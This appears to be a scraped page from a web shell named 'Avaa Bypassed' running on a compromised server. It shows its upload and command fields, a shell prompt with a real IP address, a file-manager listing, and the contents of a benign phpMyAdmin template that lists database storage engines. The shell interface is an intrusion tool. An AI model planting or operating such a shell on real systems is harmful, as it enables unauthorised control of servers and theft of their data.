404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.145.175.141: ~ $
<table class="noclick">
    <thead>
        <tr>
            <th><?= __('Storage Engine'); ?></th>
            <th><?= __('Description'); ?></th>
        </tr>
    </thead>
    <tbody>
        <?php $odd_row = true; ?>
        <?php foreach ($engines as $engine => $details): ?>
            <tr class="
                <?= $odd_row ? 'odd' : 'even'; ?>
                <?= $details['Support'] == 'NO' || $details['Support'] == 'DISABLED' ? ' disabled' : ''; ?>
                <?= $details['Support'] == 'DEFAULT' ? ' marked' : ''; ?>">
                <td>
                    <a rel="newpage" href="server_engines.php<?= PMA_URL_getCommon(array('engine' => $engine)); ?>">
                        <?= htmlspecialchars($details['Engine']); ?>
                    </a>
                </td>
                <td><?= htmlspecialchars($details['Comment']); ?></td>
            </tr>
            <?php $odd_row = !$odd_row; ?>
        <?php endforeach; ?>
    </tbody>
</table>

Filemanager

Name Type Size Permission Actions
engine.phtml File 1.43 KB 0644
engines.phtml File 973 B 0644